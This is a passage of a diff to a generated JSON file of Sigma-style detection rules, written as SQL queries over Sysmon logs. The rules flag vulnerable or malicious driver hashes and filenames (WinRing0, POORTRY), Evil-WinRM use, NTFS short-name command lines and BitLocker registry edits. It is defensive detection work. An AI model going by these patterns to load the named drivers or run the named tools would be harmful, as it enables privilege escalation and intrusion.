'4927d843577bada119a17b249ff4e7f5e9983a92', 'e5114fd50904c7fb75d8c86367b9a2dd4f79dfb1', '3ccf1f3ac636a5e21b39ede48ff49fa23e05413f', '755349d56cdd668ca22eebc4fc89f0cccef47327', '56af49e030eb85528e82849d7d1b6147f3c4973e', '45a9f95a7a018925148152b888d09d478d56bbf5', '540b9f9a232b9d597138b8e0f33d83f5f6e247af', 'bdfb25cc4ed569dc0d5849545eb4abe08539029f', '28da2ac7c82b999c53f99d55331cfa3624a0bc6f', '5d5f92fba0f39826b527f335a7cca7d363758410', '1858ab7ad1947f5c24b9c913cd975e6dbb536865', '0f2aa3bfdfd699e258382ea1b3c1db1ad7211023', '886a9c16b871da42cdb54c6738a8e088be8b989f', 'c24883645c0589f6171e8ee10080750ac66d75e6', '36d3b09e19477d807a6a5efff89aa6cc8b71bdeb', 'e58dd758e28218e1edb33cd88bb97504972ee221', 'd782ef79266179d2247807857877fabb2e402be5') OR sha256 IN ('04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162', '05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748', '4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA', '6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA', '8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F', 'B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414', '7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D', '7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA', '42579A759F3F95F20A2C51D5AC2047A2662A2675B3FB9F46C1ED7F23393A0F00', '2DA330A2088409EFC351118445A824F11EDBE51CF3D653B298053785097FE40E', '436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7', 'B4D47EA790920A4531E3DF5A4B4B0721B7FEA6B49A35679F0652F1E590422602', 'DDE6F28B3F7F2ABBEE59D4864435108791631E9CB4CDFB1F178E5AA9859956D8', 'B48A309EE0960DA3CAAAAF1E794E8C409993AEB3A2B64809F36B97AAC8A1E62A', '025E7BE9FCEFD6A83F4471BBA0C11F1C11BD5047047D26626DA24EE9A419CDC4', '2AA1B08F47FBB1E2BD2E4A492F5D616968E703E1359A921F62B38B8E4662F0C4', 'ECE0A900EA089E730741499614C0917432246CEB5E11599EE3A1BB679E24FD2C', 'F40435488389B4FB3B945CA21A8325A51E1B5F80F045AB019748D0EC66056A8B', '2A652DE6B680D5AD92376AD323021850DAB2C653ABF06EDF26120F7714B8E08A', '950A4C0C772021CEE26011A92194F0E58D61588F77F2873AA0599DFF52A160C9', '0AAFA9F47ACF69D46C9542985994FF5321F00842A28DF2396D4A3076776A83CB', '47F08F7D30D824A8F4BB8A98916401A37C0FD8502DB308ABA91FE3112B892DCC', 'B9A4E40A5D80FEDD1037EAED958F9F9EFED41EB01ADA73D51B5DCD86E27E0CBF', '5C04C274A708C9A7D993E33BE3EA9E6119DC29527A767410DBAF93996F87369A', '0040153302B88BEE27EB4F1ECA6855039E1A057370F5E8C615724FA5215BADA3', '3326E2D32BBABD69FEB6024809AFC56C7E39241EBE70A53728C77E80995422A5', '36B9E31240AB0341873C7092B63E2E0F2CAB2962EBF9B25271C3A1216B7669EB', '29E0062A017A93B2F2F5207A608A96DF4D554C5DE976BD0276C2590A03BD3E94', '45ABDBCD4C0916B7D9FAAF1CD08543A3A5178871074628E0126A6EDA890D26E0', '50DB5480D0392A7DD6AB5DF98389DC24D1ED1E9C98C9C35964B19DABCD6DC67F', '607DC4C75AC7AEF82AE0616A453866B3B358C6CF5C8F9D29E4D37F844306B97C', '61D6E40601FA368800980801A662A5B3B36E3C23296E8AE1C85726A56EF18CC8', '74A846C61ADC53692D3040AFF4C1916F32987AD72B07FE226E9E7DBEFF1036C4', '76FB4DEAEE57EF30E56C382C92ABFFE2CF616D08DBECB3368C8EE6B02E59F303', '81939E5C12BD627FF268E9887D6FB57E95E6049F28921F3437898757E7F21469', '9790A7B9D624B2B18768BB655DDA4A05A9929633CEF0B1521E79E40D7DE0A05B', '9A1D66036B0868BBB1B2823209FEDEA61A301D5DD245F8E7D390BD31E52D663E', 'AA9AB1195DC866270E984F1BED5E1358D6EF24C515DFDB6C2A92D1E1B94BF608', 'AF095DE15A16255CA1B2C27DAD365DFF9AC32D2A75E8E288F5A1307680781685', 'D5586DC1E61796A9AE5E5D1CED397874753056C3DF2EB963A8916287E1929A71', 'D8459F7D707C635E2C04D6D6D47B63F73BA3F6629702C7A6E0DF0462F6478AE2', 'E81230217988F3E7EC6F89A06D231EC66039BDBA340FD8EBB2BBB586506E3293', 'F88EBB633406A086D9CCA6BC8B66A4EA940C5476529F9033A9E0463512A23A57', '1C8DFA14888BB58848B4792FB1D8A921976A9463BE8334CFF45CC96F1276049A', '22418016E980E0A4A2D01CA210A17059916A4208352C1018B0079CCB19AAF86A', '405472A8F9400A54BB29D03B436CCD58CFD6442FE686F6D2ED4F63F002854659', '49F75746EEBE14E5DB11706B3E58ACCC62D4034D2F1C05C681ECEF5D1AD933BA', '4A3D4DB86F580B1680D6454BAEE1C1A139E2DDE7D55E972BA7C92EC3F555DCE2', '4AB41816ABBF14D59E75B7FAD49E2CB1C1FEB27A3CB27402297A2A4793FF9DA7', '54841D9F89E195196E65AA881834804FE3678F1CF6B328CAB8703EDD15E3EC57', '5EE292B605CD3751A24E5949AAE615D472A3C72688632C3040DC311055B75A92', '76B86543CE05540048F954FED37BDDA66360C4A3DDB8328213D5AEF7A960C184', '7F190F6E5AB0EDAFD63391506C2360230AF4C2D56C45FC8996A168A1FC12D457', '845F1E228DE249FC1DDF8DC28C39D03E8AD328A6277B6502D3932E83B879A65A', '84BF1D0BCDF175CFE8AEA2973E0373015793D43907410AE97E2071B2C4B8E2D4', '8EF0AD86500094E8FA3D9E7D53163AA6FEEF67C09575C169873C494ED66F057F', 'A56C2A2425EB3A4260CC7FC5C8D7BED7A3B4CD2AF256185F24471C668853AEE8', 'AC3F613D457FC4D44FA27B2E0B1BAA62C09415705EFB5A40A4756DA39B3AC165', 'B1334A71CC73B3D0C54F62D8011BEC330DFC355A239BF94A121F6E4C86A30A2E', 'B47BE212352D407D0EF7458A7161C66B47C2AEC8391DD101DF11E65728337A6A', 'B9B3878DDC5DFB237D38F8D25067267870AFD67D12A330397A8853209C4D889C', 'DB90E554AD249C2BD888282ECF7D8DA4D1538DD364129A3327B54F8242DD5653', 'E61A54F6D3869B43C4ECEAC3016DF73DF67CCE03878C5A6167166601C5D3F028', '3871E16758A1778907667F78589359734F7F62F9DC953EC558946DCDBE6951E3', '80CBBA9F404DF3E642F22C476664D63D7C229D45D34F5CD0E19C65EB41BECEC3', 'BB50818A07B0EB1BD317467139B7EB4BAD6CD89053FECDABFEAE111689825955', 'FF6729518A380BF57F1BC6F1EC0AA7F3012E1618B8D9B0F31A61D299EE2B4339', '3A5EC83FE670E5E23AEF3AFA0A7241053F5B6BE5E6CA01766D6B5F9177183C25', '61A1BDDDD3C512E681818DEBB5BEE94DB701768FC25E674FCAD46592A3259BD0', '07B6D69BAFCFD767F1B63A490A8843C3BB1F8E1BBEA56176109B5743C8F7D357', '21CCDD306B5183C00ECFD0475B3152E7D94B921E858E59B68A03E925D1715F21', '2D83CCB1AD9839C9F5B3F10B1F856177DF1594C66CBBC7661677D4B462EBF44D', 'F581DECC2888EF27EE1EA85EA23BBB5FB2FE6A554266FF5A1476ACD1D29D53AF', 'F8965FDCE668692C3785AFA3559159F9A18287BC0D53ABB21902895A8ECF221B', '3D23BDBAF9905259D858DF5BF991EB23D2DC9F4ECDA7F9F77839691ACEF1B8C4', 'DD4A1253D47DE14EF83F1BC8B40816A86CCF90D1E624C5ADF9203AE9D51D4097', '509628B6D16D2428031311D7BD2ADD8D5F5160E9ECC0CD909F1E82BBBB3234D6', '525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD', '6DE84CAA2CA18673E01B91AF58220C60AECD5CCCF269725EC3C7F226B2167492', '09BEDBF7A41E0F8DABE4F41D331DB58373CE15B2E9204540873A1884F38BDDE1', '101402D4F5D1AE413DED499C78A5FCBBC7E3BAE9B000D64C1DD64E3C48C37558', '131D5490CEB9A5B2324D8E927FEA5BECFC633015661DE2F4C2F2375A3A3B64C6', '1DDFE4756F5DB9FB319D6C6DA9C41C588A729D9E7817190B027B38E9C076D219', '1E8B0C1966E566A523D652E00F7727D8B0663F1DFDCE3B9A09B9ADFAEF48D8EE', '2BBE65CBEC3BB069E92233924F7EE1F95FFA16173FCEB932C34F68D862781250', '30706F110725199E338E9CC1C940D9A644D19A14F0EB8847712CBA4CACDA67AB', '3124B0411B8077605DB2A9B7909D8240E0D554496600E2706E531C93C931E1B5', '38FA0C663C8689048726666F1C5E019FEAA9DA8278F1DF6FF62DA33961891D2A', '39CFDE7D401EFCE4F550E0A9461F5FC4D71FA07235E1336E4F0B4882BD76550E', '3D9E83B189FCF5C3541C62D1F54A0DA0A4E5B62C3243D2989AFC46644056C8E3', '3F2FDA9A7A9C57B7138687BBCE49A2E156D6095DDDABB3454EA09737E02C3FA5', '47F0CDAA2359A63AD1389EF4A635F1F6EEE1F63BDF6EF177F114BDCDADC2E005', '50D5EAA168C077CE5B7F15B3F2C43BD2B86B07B1E926C1B332F8CB13BD2E0793', '56A3C9AC137D862A85B4004F043D46542A1B61C6ACB438098A9640469E2D80E7', '591BD5E92DFA0117B3DAA29750E73E2DB25BAA717C31217539D30FFB1F7F3A52', '5D530E111400785D183057113D70623E17AF32931668AB7C7FC826F0FD4F91A3', '6F1FF29E2E710F6D064DC74E8E011331D807C32CC2A622CBE507FD4B4D43F8F4', '79E2D37632C417138970B4FEBA91B7E10C2EA251C5EFE3D1FC6FA0190F176B57', '85866E8C25D82C1EC91D7A8076C7D073CCCF421CF57D9C83D80D63943A4EDD94', '89B0017BC30CC026E32B758C66A1AF88BD54C6A78E11EC2908FF854E00AC46BE', '9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', '9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', '6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', '80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', '9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', '5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", - "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - WinRM Access Via Evil-WinRM", + "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "status": "test", + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_hktl_evil_winrm.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' 